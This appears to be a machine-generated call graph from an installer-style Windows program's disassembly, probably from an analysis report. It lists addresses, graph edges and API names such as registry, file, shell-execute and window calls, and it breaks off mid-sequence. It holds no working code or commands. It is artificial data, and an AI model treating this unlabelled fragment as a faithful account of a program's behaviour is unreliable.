4022d5 5249 402305 5248->5249 5250 4022da 5248->5250 5251 402b3a 18 API calls 5249->5251 5252 402c44 19 API calls 5250->5252 5253 40230c 5251->5253 5254 4022e1 5252->5254 5259 402b7a RegOpenKeyExW 5253->5259 5255 402b3a 18 API calls 5254->5255 5258 402322 5254->5258 5256 4022f2 RegDeleteValueW RegCloseKey 5255->5256 5256->5258 5266 402ba5 5259->5266 5268 402bf1 5259->5268 5260 402bcb RegEnumKeyW 5261 402bdd RegCloseKey 5260->5261 5260->5266 5263 406254 3 API calls 5261->5263 5262 402c02 RegCloseKey 5262->5268 5265 402bed 5263->5265 5264 402b7a 3 API calls 5264->5266 5267 402c1d RegDeleteKeyW 5265->5267 5265->5268 5266->5260 5266->5261 5266->5262 5266->5264 5267->5268 5268->5258 4458 403c57 4459 403daa 4458->4459 4460 403c6f 4458->4460 4462 403dfb 4459->4462 4463 403dbb GetDlgItem GetDlgItem 4459->4463 4460->4459 4461 403c7b 4460->4461 4464 403c86 SetWindowPos 4461->4464 4465 403c99 4461->4465 4467 403e55 4462->4467 4472 401389 2 API calls 4462->4472 4466 40412f 19 API calls 4463->4466 4464->4465 4469 403cb6 4465->4469 4470 403c9e ShowWindow 4465->4470 4471 403de5 SetClassLongW 4466->4471 4468 40417b SendMessageW 4467->4468 4489 403da5 4467->4489 4499 403e67 4468->4499 4473 403cd8 4469->4473 4474 403cbe DestroyWindow 4469->4474 4470->4469 4475 40140b 2 API calls 4471->4475 4476 403e2d 4472->4476 4478 403cdd SetWindowLongW 4473->4478 4479 403cee 4473->4479 4477 4040d9 4474->4477 4475->4462 4476->4467 4480 403e31 SendMessageW 4476->4480 4488 4040e9 ShowWindow 4477->4488 4477->4489 4478->4489 4483 403d97 4479->4483 4484 403cfa GetDlgItem 4479->4484 4480->4489 4481 40140b 2 API calls 4481->4499 4482 4040ba DestroyWindow EndDialog 4482->4477 4487 404196 8 API calls 4483->4487 4485 403d2a 4484->4485 4486 403d0d SendMessageW IsWindowEnabled 4484->4486 4491 403d37 4485->4491 4492 403d7e SendMessageW 4485->4492 4493 403d4a 4485->4493 4504 403d2f 4485->4504 4486->4485 4486->4489 4487->4489 4488->4489 4490 405f0c 18 API calls 4490->4499 4491->4492 4491->4504 4492->4483 4496 403d52 4493->4496 4497 403d67 4493->4497 4495 40412f 19 API calls 4495->4499 4501 40140b 2 API calls 4496->4501 4500 40140b 2 API calls 4497->4500 4498 403d65 4498->4483 4499->4481 4499->4482 4499->4489 4499->4490 4499->4495 4503 40412f 19 API calls 4499->4503 4519 403ffa DestroyWindow 4499->4519 4502 403d6e 4500->4502 4501->4504 4502->4483 4502->4504 4505 403ee2 GetDlgItem 4503->4505 4532 404108 4504->4532 4506 403ef7 4505->4506 4507 403eff ShowWindow KiUserCallbackDispatcher 4505->4507 4506->4507 4529 404151 EnableWindow 4507->4529 4509 403f29 EnableWindow 4512 403f3d 4509->4512 4510 403f42 GetSystemMenu EnableMenuItem SendMessageW 4511 403f72 SendMessageW 4510->4511 4510->4512 4511->4512 4512->4510 4530 404164 SendMessageW 4512->4530 4531 405eea lstrcpynW 4512->4531 4515 403fa0 lstrlenW 4516 405f0c 18 API calls 4515->4516 4517 403fb6 SetWindowTextW 4516->4517 4518 401389 2 API calls 4517->4518 4518->4499 4519->4477 4520 404014 CreateDialogParamW 4519->4520 4520->4477 4521 404047 4520->4521 4522 40412f 19 API calls 4521->4522 4523 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4522->4523 4524 401389 2 API calls 4523->4524 4525 404098 4524->4525 4525->4489 4526 4040a0 ShowWindow 4525->4526 4527 40417b SendMessageW 4526->4527 4528 4040b8 4527->4528 4528->4477 4529->4509 4530->4512 4531->4515 4533 404115 SendMessageW 4532->4533 4534 40410f 4532->4534 4533->4498 4534->4533 5269 4014d7 5270 402b1d 18 API calls 5269->5270 5271 4014dd Sleep 5270->5271 5273 4029c7 5271->5273 4761 40335a #17 SetErrorMode OleInitialize 4762 406254 3 API calls 4761->4762 4763 40339d SHGetFileInfoW 4762->4763 4834 405eea lstrcpynW 4763->4834 4765 4033c8 GetCommandLineW 4835 405eea lstrcpynW 4765->4835 4767 4033da GetModuleHandleW 4768 4033f2 4767->4768 4769 405962 CharNextW 4768->4769 4770 403401 CharNextW 4769->4770 4780 403411 4770->4780 4771 4034e6 4772 4034fa GetTempPathW 4771->4772 4836 403326 4772->4836 4774 403512 4775 403516 GetWindowsDirectoryW lstrcatW 4774->4775 4776 40356c DeleteFileW 4774->4776 4778 403326 11 API calls 4775->4778 4844 402dbc GetTickCount GetModuleFileNameW 4776->4844 4777 405962 CharNextW 4777->4780 4781 403532 4778->4781 4780->4771 4780->4777 4784 4034e8 4780->4784 4781->4776 4783 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4781->4783 4782 403580 4785 403618 4782->4785 4789 403608 4782->4789 4792 405962 CharNextW 4782->4792 4788 403326 11 API calls 4783->4788 4928 405eea lstrcpynW 4784->4928 4931 4037c2 4785->4931 4791 403564 4788->4791 4874 4038b4 4789->4874 4791->4776 4791->4785 4794 40359b 4792->4794 4801 4035e2 4794->4801 4802 403647 lstrcatW lstrcmpiW 4794->4802 4795 403631 4797 4056c6 MessageBoxIndirectW 4795->4797 4796 403727 4798 4037aa ExitProcess 4796->4798 4799 406254 3 API calls 4796->4799 4803 40363f ExitProcess 4797->4803 4804 403736 4799->4804 4805 405a3d 18 API calls 4801->4805 4802->4785 4806 403663 CreateDirectoryW SetCurrentDirectoryW 4802->4806 4807 406254 3 API calls 4804->4807 4808 4035ee 4805->4808 4809 403686 4806->4809 4810 40367b 4806->4810 4811 40373f 4807->4811 4808->4785 4929 405eea lstrcpynW 4808->4929 4941 405eea lstrcpynW 4809->4941 4940 405eea lstrcpynW 4810->4940 4814 406254 3 API calls 4811->4814 4816 403748 4814->4816 4818 403796 ExitWindowsEx 4816->4818 4825 403756 GetCurrentProcess 4816->4825 4817 4035fd 4930 405eea lstrcpynW 4817->4930 4818->4798 4821 4037a3 4818->4821 4820 405f0c 18 API calls 4822 4036c5 DeleteFileW 4820->4822 4823 40140b 2 API calls 4821->4823 4824 4036d2 CopyFileW 4822->4824 4831 403694 4822->4831 4823->4798 4824->4831 4828 403766 4825->4828 4826 40371b 4829 405d84 40 API calls 4826->4829 4827 405d84 40 API calls 4827->4831 4828->4818 4829->4785 4830 405f0c 18 API calls 4830->4831 4831->4820 4831->4826 4831->4827 4831->4830 4832 405665 2 API calls 4831->4832 4833 403706 CloseHandle 4831->4833 4832->4831 4833->4831 4834->4765 4835->4767 4837 40617e 5 API calls 4836->4837 4839 403332 4837->4839 4838 40333c 4838->4774 4839->4838 4840 405935 3 API calls 4839->4840 4841 403344 CreateDirectoryW 4840->4841 4942 405b85 4841->4942 4946 405b56 GetFileAttributesW CreateFileW 4844->4946 4846 402dff 4873 402e0c 4846->4873 4947 405eea lstrcpynW 4846->4947 4848 402e22 4849 405981 2 API calls 4848->4849 4850 402e28 4849->4850 4948 405eea lstrcpynW 4850->4948 4852 402e33 GetFileSize 4853 402f34 4852->4853 4872 402e4a 4852->4872 4854 402d1a 33 API calls 4853->4854 4856 402f3b 4854->4856 4855 4032f9 ReadFile 4855->4872 4858 402f77 GlobalAlloc 4856->4858 4856->4873 4950 40330f SetFilePointer 4856->4950 4857 402fcf 4860 402d1a 33 API calls 4857->4860 4859 402f8e 4858->4859 4865 405b85 2 API calls 4859->4865 4860->4873 4862 402f58 4863 4032f9 ReadFile 4862->4863 4866 402f63 4863->4866 4864 402d1a 33 API calls 4864->4872 4867 402f9f CreateFileW 4865->4867 4866->4858 4866->4873 4868 402fd9 4867->4868 4867->4873 4949 40330f SetFilePointer 4868->4949 4870 402fe7 4871 403062 46 API calls 4870->4871 4871->4873 4872->4853 4872->4855 4872->4857 4872->4864 4872->4873 4873->4782 4875 406254 3 API calls 4874->4875 4876 4038c8 4875->4876 4877 4038e0 4876->4877 4878 4038ce 4876->4878 4879 405db7 3 API calls 4877->4879 4960 405e31 wsprintfW 4878->4960 4880 403910 4879->4880 4882 40392f lstrcatW 4880->4882 4884 405db7 3 API calls 4880->4884 4883 4038de 4882->4883 4951 403b8a 4883->4951 4884->4882 4887 405a3d 18 API calls 4888 403961 4887->4888 4889 4039f5 4888->4889 4891 405db7 3 API calls 4888->4891 4890 405a3d 18 API calls 4889->4890 4892 4039fb 4890->4892 4893 403993 4891->4893 4894 403a0b LoadImageW 4892->4894 4895 405f0c 18 API calls 4892->4895 4893->4889 4898 4039b4 lstrlenW 4893->4898 4902 405962 CharNextW 4893->4902 4896 403ab1 4894->4896 4897 403a32 RegisterClassW 4894->4897 4895->4894 4901 40140b 2 API calls 4896->4901 4899 403abb 4897->4899 4900 403a68 SystemParametersInfoW CreateWindowExW 4897->4900 4903 4039c2 lstrcmpiW 4898->4903 4904 4039e8 4898->4904 4899->4785 4900->4896 4905 403ab7 4901->4905 4906 4039b1 4902->4906 4903->4904 4907 4039d2 GetFileAttributesW 4903->4907 4908 405935 3 API calls 4904->4908 4905->4899 4910 403b8a 19 API calls 4905->4910 4906->4898 4909 4039de 4907->4909 4911 4039ee 4908->4911 4909->4904 4913 405981 2 API calls 4909->4913 4914 403ac8 4910->4914 4961 405eea lstrcpynW 4911->4961 4913->4904 4915 403ad4 ShowWindow LoadLibraryW 4914->4915 4916 403b57 4914->4916 4917 403af3 LoadLibraryW 4915->4917 4918 403afa GetClassInfoW 4915->4918 4962 405267 OleInitialize 4916->4962 4917->4918 4920 403b24 DialogBoxParamW 4918->4920 4921 403b0e GetClassInfoW RegisterClassW 4918->4921 4923 40140b 2 API calls 4920->4923 4921->4920 4922 403b5d 4924 403b61 4922->4924 4925 403b79 4922->4925 4923->4899 4924->4899 4927 40140b 2 API calls 4924->4927 4926 40140b 2 API calls 4925->4926 4926->4899 4927->4899 4928->4772 4929->4817 4930->4789 4932 4037d3 CloseHandle 4931->4932 4933 4037dd 4931->4933 4932->4933 4934 4037f1 4933->4934 4935 4037e7 CloseHandle 4933->4935 4970 40381f 4934->4970 4935->4934 4938 405772 71 API calls 4939 403621 OleUninitialize 4938->4939 4939->4795 4939->4796 4940->4809 4941->4831 4943 405b92 GetTickCount GetTempFileNameW 4942->4943 4944 403358 4943->4944 4945 405bc8 4943->4945 4944->4774 4945->4943 4945->4944 4946->4846 4947->4848 4948->4852 4949->4870 4950->4862 4952 403b9e 4951->4952 4969 405e31 wsprintfW 4952->4969 4954 403c0f 4955 405f0c 18 API calls 4954->4955 4956 403c1b SetWindowTextW 4955->4956 4957 40393f 4956->4957 4958 403c37 4956->4958 4957->4887 4958->4957 4959 405f0c 18 API calls 4958->4959 4959->4958 4960->4883 4961->4889 4963 40417b SendMessageW 4962->4963 4964 40528a 4963->4964 4967 401389 2 API calls 4964->4967 4968 4052b1 4964->4968 4965 40417b SendMessageW 4966 4052c3 OleUninitialize 4965->4966 4966->4922 4967->4964 4968->4965 4969->4954 4971 40382d 4970->4971 4972 4037f6 4971->4972 4973 403832 FreeLibrary GlobalFree 4971->4973 4972->4938 4973->4972 4973->4973 5274 40155b 5275 40296d 5274->5275 5278 405e31 wsprintfW 5275->5278 5277 402972 5278->5277 3905 4023e0 3916 402c44 3905->3916 3907 4023ea 3920 402b3a 3907->3920 3910 4023fe RegQueryValueExW 3911 402424 RegCloseKey 3910->3911 3912 40241e 3910->3912 3915 402793 3911->3915 3912->3911 3926 405e31 wsprintfW 3912->3926 3917 402b3a 18 API calls 3916->3917 3918 402c5d 3917->3918 3919 402c6b RegOpenKeyExW 3918->3919 3919->3907 3921 402b46 3920->3921 3927 405f0c 3921->3927 3924 4023f3 3924->3910 3924->3915 3926->3911 3929 405f19 3927->3929 3928 406164 3930 402b67 3928->3930 3961 405eea lstrcpynW 3928->3961 3929->3928 3932 405fcc GetVersion 3929->3932 3933 406132 lstrlenW 3929->3933 3935 405f0c 10 API calls 3929->3935 3938 406047 GetSystemDirectoryW 3929->3938 3939 40605a GetWindowsDirectoryW 3929->3939 3940 40617e 5 API calls 3929->3940 3941 405f0c 10 API calls 3929->3941 3942 4060d3 lstrcatW 3929->3942 3943 40608e SHGetSpecialFolderLocation 3929->3943 3954 405db7 RegOpenKeyExW 3929->3954 3959 405e31 wsprintfW 3929->3959 3960 405eea lstrcpynW 3929->3960 3930->3924 3945 40617e 3930->3945 3932->3929 3933->3929 3935->3933 3938->3929 3939->3929 3940->3929 3941->3929 3942->3929 3943->3929 3944 4060a6 SHGetPathFromIDListW CoTaskMemFree 3943->3944 3944->3929 3948 40618b 3945->3948 3946 406201 3947 406206 CharPrevW 3946->3947 3950 406227 3946->3950 3947->3946 3948->3946 3949 4061f4 CharNextW 3948->3949 3952 4061e0 CharNextW 3948->3952 3953 4061ef CharNextW 3948->3953 3962 405962 3948->3962 3949->3946 3949->3948 3950->3924 3952->3948 3953->3949 3955 405e2b 3954->3955 3956 405deb RegQueryValueExW 3954->3956 3955->3929 3957 405e0c RegCloseKey 3956->3957 3957->3955 3959->3929 3960->3929 3961->3930 3963 405968 3962->3963 3964 40597e 3963->3964 3965 40596f CharNextW 3963->3965 3964->3948 3965->3963 5286 401ce5 GetDlgItem GetClientRect 5287 402b3a 18 API calls 5286->5287 5288 401d17 LoadImageW SendMessageW 5287->5288 5289 401d35 DeleteObject 5288->5289 5290 4029c7 5288->5290 5289->5290 4188 40206a 4189 402b3a 18 API calls 4188->4189 4190 402071 4189->4190 4191 402b3a 18 API calls 4190->4191 4192 40207b 4191->4192 4193 402b3a 18 API calls 4192->4193 4194 402084 4193->4194 4195 402b3a 18 API calls 4194->4195 4196 40208e 4195->4196 4197 402b3a 18 API calls 4196->4197 4198 402098 4197->4198 4199 4020ac CoCreateInstance 4198->4199 4200 402b3a 18 API calls 4198->4200 4203 4020cb 4199->4203 4200->4199 4202 402197 4203->4202 4204 401423 4203->4204 4205 405194 25 API calls 4204->4205 4206 401431 4205->4206 4206->4202 5291 40156b 5292 401584 5291->5292 5293 40157b ShowWindow 5291->5293 5294 401592 ShowWindow 5292->5294 5295 4029c7 5292->5295 5293->5292 5294->5295 5296 4024ee 5297 4024f3 5296->5297 5298 40250c 5296->5298 5299 402b1d 18 API calls 5297->5299 5300 402512 5298->5300 5301 40253e 5298->5301 5304 4024fa 5299->5304 5302 402b3a 18 API calls 5300->5302 5303 402b3a 18 API calls 5301->5303 5305 402519 WideCharToMultiByte lstrlenA 5302->5305 5306 402545 lstrlenW 5303->5306 5307 402567 WriteFile 5304->5307 5308 402793 5304->5308 5305->5304 5306->5304 5307->5308 5309 4018ef 5310 401926 5309->5310 5311 402b3a 18 API calls 5310->5311 5312 40192b 5311->5312 5313 405772 71 API calls 5312->5313 5314 401934 5313->5314 5315 402770 5316 402b3a 18 API calls 5315->5316 5317 402777 FindFirstFileW 5316->5317 5318 40278a 5317->5318 5319 40279f 5317->5319 5320 4027a8 5319->5320 5323 405e31 wsprintfW 5319->5323 5324 405eea lstrcpynW 5320->5324 5323->5320 5324->5318 5325 4014f1 SetForegroundWindow 5326 4029c7 5325->5326 5327 403872 5328 40387d 5327->5328 5329 403881 5328->5329 5330 403884 GlobalAlloc 5328->5330 5330->5329 5331 4018f2 5332 402b3a 18 API calls 5331->5332 5333 4018f9 5332->5333 5334 4056c6 MessageBoxIndirectW 5333->5334 5335 401902 5334->5335 4445 402573 4446 402b1d 18 API calls 4445->4446 4447 402582 4446->4447 4448 4025c8 ReadFile 4447->4448 4449 405bd9 ReadFile 4447->4449 4450 4026a2 4447->4450 4451 402608 MultiByteToWideChar 4447->4451 4453 40262e SetFilePointer MultiByteToWideChar 4447->4453 4454 4026b3 4447->4454 4456 4026a0 4447->4456 4448->4447 4448->4456 4449->4447 4457 405e31 wsprintfW 4450->4457 4451->4447 4453->4447 4455 4026d4 SetFilePointer 4454->4455 4454->4456 4455->4456 4457->4456 5336 401df3 5337 402b3a 18 API calls 5336->5337 5338 401df9 5337->5338 5339 402b3a 18 API calls 5338->5339 5340 401e02 5339->5340 5341 402b3a 18 API calls 5340->5341 5342 401e0b 5341->5342 5343 402b3a 18 API calls 5342->5343 5344 401e14 5343->5344 5345 401423 25 API calls 5344->5345 5346 401e1b ShellExecuteW 5345->5346 5347 401e4c 5346->5347 4733 4026f9 4734 402700 4733->4734 4737 402972 4733->4737 4735 402b1d 18 API calls 4734->4735 4736 40270b 4735->4736 4738 402712 SetFilePointer 4736->4738 4738->4737 4739 402722 4738->4739 4741 405e31 wsprintfW 4739->4741 4741->4737 5374 40427d lstrlenW 5375 40429c 5374->5375 5376 40429e WideCharToMultiByte 5374->5376 5375->5376 5377 1000103d 5378 1000101b 8 API calls 5377->5378 5379 10001056 5378->5379 5380 402c7f 5381 402c91 SetTimer 5380->5381 5382 402caa 5380->5382 5381->5382 5383 402cf8 5382->5383 5384 402cfe MulDiv 5382->5384 5385 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5384->5385 5385->5383 5387 4014ff 5388 401507 5387->5388 5390 40151a 5387->5390 5389 402b1d 18 API calls 5388->5389 5389->5390 5391 401000 5392 401037 BeginPaint GetClientRect 5391->5392 5395 40100c DefWindowProcW 5391->5395 5393 4010f3 5392->5393 5397 401073 CreateBrushIndirect FillRect DeleteObject 5393->5397 5398 4010fc 5393->5398 5396 401179 5395->5396 5397->5393 5399 401102 CreateFontIndirectW 5398->5399 5400 401167 EndPaint 5398->5400 5399->5400 5401 401112 6 API calls 5399->5401 5400->5396 5401->5400 5402 401a00 5403 402b3a 18 API calls 5402->5403 5404 401a09 ExpandEnvironmentStringsW 5403->5404 5405 401a30 5404->5405 5406 401a1d 5404->5406 5406->5405 5407 401a22 lstrcmpW 5406->5407 5407->5405 5408 401b01 5409 402b3a 18 API calls 5408->5409 5410 401b08 5409->5410 5411 402b1d 18 API calls 5410->5411 5412 401b11 wsprintfW 5411->5412 5413 4029c7 5412->5413 5414 100018c1 5415 10001243 3 API calls 5414->5415 5416 100018e7 5415->5416 5417 10001243 3 API calls 5416->5417 5418 100018ef 5417->5418 5419 10001243 3 API calls 5418->5419 5421 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5418->5421 5420 10001916 5419->5420 5422 1000191f GlobalFree 5420->5422 5423 10001280 2 API calls 5421->5423 5422->5421 5424 10001aad GlobalFree GlobalFree 5423->5424 5425 10002a43 5426 10002a5b 5425->5426 5427 100015a7 2 API calls 5426->5427 5428 10002a76 5427->5428 5429 404583 5430 404593 5429->5430 5431 4045b9 5429->5431 5432 40412f 19 API calls 5430->5432 5433 404196 8 API calls 5431->5433 5434 4045a0 SetDlgItemTextW 5432->5434 5435 4045c5 5433->5435 5434->5431 4147 405108 4148 405118 4147->4148 4149 40512c 4147->4149 4150 40511e 4148->4150 4160 405175 4148->4160 4151 405134 IsWindowVisible 4149->4151 4158 405154 4149->4158 4161 40417b 4150->4161 4154 405141 4151->4154 4151->4160 4152 40517a CallWindowProcW 4155 405128 4152->4155 4164 404a5e SendMessageW 4154->4164 4158->4152 4169 404ade 4158->4169 4160->4152 4162 404193 4161->4162 4163 404184 SendMessageW 4161->4163 4162->4155 4163->4162 4165 404a81 GetMessagePos ScreenToClient SendMessageW 4164->4165 4166 404abd SendMessageW 4164->4166 4167 404ab5 4165->4167 4168 404aba 4165->4168 4166->4167 4167->4158 4168->4166 4178 405eea lstrcpynW 4169->4178 4171 404af1 4179 405e31 wsprintfW 4171->4179 4173 404afb 4180 40140b 4173->4180 4177 404b0b 4177->4160 4178->4171 4179->4173 4184 401389 4180->4184 4183 405eea lstrcpynW 4183->4177 4186 401390 4184->4186 4185 4013fe 4185->4183 4186->4185 4187 4013cb MulDiv SendMessageW 4186->4187 4187->4186 5436 401f08 5437 402b3a 18 API calls 5436->5437 5438 401f0f GetFileVersionInfoSizeW 5437->5438 5439 401f36 GlobalAlloc 5438->5439 5441 401f8c 5438->5441 5440 401f4a GetFileVersionInfoW 5439->5440 5439->5441 5440->5441 5442 401f59 VerQueryValueW 5440->5442 5442->5441 5443 401f72 5442->5443 5447 405e31 wsprintfW 5443->5447 5445 401f7e 5448 405e31 wsprintfW 5445->5448 5447->5445 5448->5441 5456 1000224c 5457 100022b1 5456->5457 5458 100022e7 5456->5458 5457->5458 5459 100022c3 GlobalAlloc 5457->5459 5459->5457 5460 100016ce 5461 100016fd 5460->5461 5462 10001b3e 24 API calls 5461->5462 5463 10001704 5462->5463 5464 10001717 5463->5464 5465 1000170b 5463->5465 5467 10001721 5464->5467 5468 1000173e 5464->5468 5466 10001280 2 API calls 5465->5466 5471 10001715 5466->5471 5472 10001555 3 API calls 5467->5472 5469 10001744 5468->5469 5470 10001768 5468->5470 5473 100015cc 3 API calls 5469->5473 5474 10001555 3 API calls 5470->5474 5475 10001726 5472->5475 5476 10001749 5473->5476 5474->5471 5477 100015cc 3 API calls 5475->5477 5479 10001280 2 API calls 5476->5479 5478 1000172c 5477->5478 5480 10001280 2 API calls 5478->5480 5481 1000174f GlobalFree 5479->5481 5482 10001732 GlobalFree 5480->5482 5481->5471 5483 10001763 GlobalFree 5481->5483 5482->5471 5483->5471 4210 404b10 GetDlgItem GetDlgItem 4211 404b62 7 API calls 4210->4211 4220 404d7b 4210->4220 4212 404c05 DeleteObject 4211->4212 4213 404bf8 SendMessageW 4211->4213 4214 404c0e 4212->4214 4213->4212 4215 404c1d 4214->4215 4216 404c45 4214->4216 4218 405f0c 18 API calls 4215->4218 4266 40412f 4216->4266 4217 404f0b 4224 404f15 SendMessageW 4217->4224 4232 404f1d 4217->4232 4225 404c27 SendMessageW SendMessageW 4218->4225 4219 404e40 4223 404e5f 4219->4223 4231 404e51 SendMessageW 4219->4231 4220->4219 4220->4223 4226 404ddb 4220->4226 4222 4050f3 4279 404196 4222->4279 4223->4217 4223->4222 4229 404eb8 SendMessageW 4223->4229 4224->4232 4225->4214 4233 404a5e 5 API calls 4226->4233 4227 404c59 4228 40412f 19 API calls 4227->4228 4246 404c67 4228->4246 4229->4222 4235 404ecd SendMessageW 4229->4235 4231->4223 4237 404f36 4232->4237 4238 404f2f ImageList_Destroy 4232->4238 4242 404f46 4232->4242 4245 404dec 4233->4245 4234 4050b5 4234->4222 4243 4050c7 ShowWindow GetDlgItem ShowWindow 4234->4243 4241 404ee0 4235->4241 4239 404f3f GlobalFree 4237->4239 4237->4242 4238->4237 4239->4242 4240 404d3c GetWindowLongW SetWindowLongW 4244 404d55 4240->4244 4251 404ef1 SendMessageW 4241->4251 4242->4234 4256 404ade 4 API calls 4242->4256 4260 404f81 4242->4260 4243->4222 4247 404d73 4244->4247 4248 404d5b ShowWindow 4244->4248 4245->4219 4246->4240 4250 404cb7 SendMessageW 4246->4250 4252 404d36 4246->4252 4254 404cf3 SendMessageW 4246->4254 4255 404d04 SendMessageW 4246->4255 4270 404164 SendMessageW 4247->4270 4269 404164 SendMessageW 4248->4269 4250->4246 4251->4217 4252->4240 4252->4244 4254->4246 4255->4246 4256->4260 4257 404d6e 4257->4222 4258 40508b InvalidateRect 4258->4234 4259 4050a1 4258->4259 4271 404978 4259->4271 4261 404faf SendMessageW 4260->4261 4262 404fc5 4260->4262 4261->4262 4262->4258 4264 405026 4262->4264 4265 405039 SendMessageW SendMessageW 4262->4265 4264->4265 4265->4262 4267 405f0c 18 API calls 4266->4267 4268 40413a SetDlgItemTextW 4267->4268 4268->4227 4269->4257 4270->4220 4272 404995 4271->4272 4273 405f0c 18 API calls 4272->4273 4274 4049ca 4273->4274 4275 405f0c 18 API calls 4274->4275 4276 4049d5 4275->4276 4277 405f0c 18 API calls 4276->4277 4278 404a06 lstrlenW wsprintfW SetDlgItemTextW 4277->4278 4278->4234 4280 4041ae GetWindowLongW 4279->4280 4281 404237 4279->4281 4280->4281 4282 4041bf 4280->4282 4283 4041d1 4282->4283 4284 4041ce GetSysColor 4282->4284 4285 4041e1 SetBkMode 4283->4285 4286 4041d7 SetTextColor 4283->4286 4284->4283 4287 4041f9 GetSysColor 4285->4287 4288 4041ff 4285->4288 4286->4285 4287->4288 4289 404210 4288->4289 4290 404206 SetBkColor 4288->4290 4289->4281 4291 404223 DeleteObject 4289->4291 4292 40422a CreateBrushIndirect 4289->4292 4290->4289 4291->4292 4292->4281 5484 401491 5485 405194 25 API calls 5484->5485 5486 401498 5485->5486 5487 404912 5488 404922 5487->5488 5489 40493e 5487->5489 5498 4056aa GetDlgItemTextW 5488->5498 5491 404971 5489->5491 5492 404944 SHGetPathFromIDListW 5489->5492 5494 40495b SendMessageW 5492->5494 5495 404954 5492->5495 5493 40492f SendMessageW 5493->5489 5494->5491 5497 40140b 2 API calls 5495->5497 5497->5494 5498->5493 5499 402295 5500 402b3a 18 API calls 5499->5500 5501 4022a4 5500->5501 5502 402b3a 18 API calls 5501->5502 5503 4022ad 5502->5503 5504 402b3a 18 API calls 5503->5504 5505 4022b7 GetPrivateProfileStringW 5504->5505 4535 401718 4536 402b3a 18 API calls 4535->4536 4537 40171f SearchPathW 4536->4537 4538 40173a 4537->4538 4539 401f98 4540 40205c 4539->4540 4541 401faa 4539->4541 4544 401423 25 API calls 4540->4544 4542 402b3a 18 API calls 4541->4542 4543 401fb1 4542->4543 4545 402b3a 18 API calls 4543->4545 4549 402197 4544->4549 4546 401fba 4545->4546 4547 401fd0 LoadLibraryExW 4546->4547 4548 401fc2 GetModuleHandleW 4546->4548 4547->4540 4550 401fe1 4547->4550 4548->4547 4548->4550 4562 4062c0 WideCharToMultiByte 4550->4562 4553 401ff2 4555 402011 4553->4555 4556 401ffa 4553->4556 4554 40202b 4557 405194 25 API calls 4554->4557 4565 10001771 4555->4565 4558 401423 25 API calls 4556->4558 4559 402002 4557->4559 4558->4559 4559->4549 4560 40204e FreeLibrary 4559->4560 4560->4549 4563 4062ea GetProcAddress 4562->4563 4564 401fec 4562->4564 4563->4564 4564->4553 4564->4554 4566 100017a1 4565->4566 4607 10001b3e 4566->4607 4568 100017a8 4569 100018be 4568->4569 4570 100017c0 4568->4570 4571 100017b9 4568->4571 4569->4559 4641 100022eb 4570->4641 4659 100022a1 4571->4659 4576 10001824 4580 10001866 4576->4580 4581 1000182a 4576->4581 4577 10001806 4672 1000248d 4577->4672 4578 100017d6 4583 100017dc 4578->4583 4588 100017e7 4578->4588 4579 100017ef 4592 100017e5 4579->4592 4669 10002b23 4579->4669 4586 1000248d 10 API calls 4580->4586 4584 100015cc 3 API calls 4581->4584 4583->4592 4653 10002868 4583->4653 4591 10001840 4584->4591 4593 10001858 4586->4593 4663 1000260b 4588->4663 4596 1000248d 10 API calls 4591->4596 4592->4576 4592->4577 4598 100018ad 4593->4598 4695 10002450 4593->4695 4595 100017ed 4595->4592 4596->4593 4598->4569 4600 100018b7 GlobalFree 4598->4600 4600->4569 4604 10001899 4604->4598 4699 10001555 wsprintfW 4604->4699 4606 10001892 FreeLibrary 4606->4604 4702 1000121b GlobalAlloc 4607->4702 4609 10001b62 4703 1000121b GlobalAlloc 4609->4703 4611 10001b6d 4704 10001243 4611->4704 4613 10001da0 GlobalFree GlobalFree GlobalFree 4614 10001dbd 4613->4614 4628 10001e07 4613->4628 4615 1000210d 4614->4615 4622 10001dd2 4614->4622 4614->4628 4617 1000212f GetModuleHandleW 4615->4617 4615->4628 4616 10001c43 GlobalAlloc 4638 10001b75 4616->4638 4620 10002140 LoadLibraryW 4617->4620 4621 10002155 4617->4621 4618 10001c8e lstrcpyW 4623 10001c98 lstrcpyW 4618->4623 4619 10001cac GlobalFree 4619->4638 4620->4621 4620->4628 4715 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4621->4715 4622->4628 4711 1000122c 4622->4711 4623->4638 4625 100021a7 4626 100021b4 lstrlenW 4625->4626 4625->4628 4716 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4626->4716 4628->4568 4629 10002167 4629->4625 4640 10002191 GetProcAddress 4629->4640 4631 10002067 4631->4628 4636 100020af lstrcpyW 4631->4636 4633 10001cea 4633->4638 4709 100015a7 GlobalSize GlobalAlloc 4633->4709 4634 10001f56 GlobalFree 4634->4638 4635 100021ce 4635->4628 4636->4628 4638->4613 4638->4616 4638->4618 4638->4619 4638->4623 4638->4628 4638->4631 4638->4633 4638->4634 4639 1000122c 2 API calls 4638->4639 4714 1000121b GlobalAlloc 4638->4714 4639->4638 4640->4625 4648 10002303 4641->4648 4642 1000122c GlobalAlloc lstrcpynW 4642->4648 4643 10001243 3 API calls 4643->4648 4645 10002419 GlobalFree 4646 100017c6 4645->4646 4645->4648 4646->4578 4646->4579 4646->4592 4647 100023d5 GlobalAlloc WideCharToMultiByte 4647->4645 4648->4642 4648->4643 4648->4645 4648->4647 4649 100023ae GlobalAlloc 4648->4649 4650 10002390 lstrlenW 4648->4650 4719 100012c8 4648->4719 4651 1000239b 4649->4651 4650->4645 4650->4651 4651->4645 4724 1000259f 4651->4724 4655 1000287a 4653->4655 4654 1000291f EnumWindows 4656 1000293d 4654->4656 4655->4654 4657 10002a39 4656->4657 4658 10002a2e GetLastError 4656->4658 4657->4592 4658->4657 4660 100022b1 4659->4660 4662 100017bf 4659->4662 4661 100022c3 GlobalAlloc 4660->4661 4660->4662 4661->4660 4662->4570 4667 10002627 4663->4667 4664 10002678 GlobalAlloc 4668 1000269a 4664->4668 4665 1000268b 4666 10002690 GlobalSize 4665->4666 4665->4668 4666->4668 4667->4664 4667->4665 4668->4595 4670 10002b2e 4669->4670 4671 10002b6e GlobalFree 4670->4671 4676 100024ad 4672->4676 4674 100024db wsprintfW 4674->4676 4675 10002581 GlobalFree 4675->4676 4679 1000180c 4675->4679 4676->4674 4676->4675 4677 10002558 GlobalFree 4676->4677 4678 1000250e 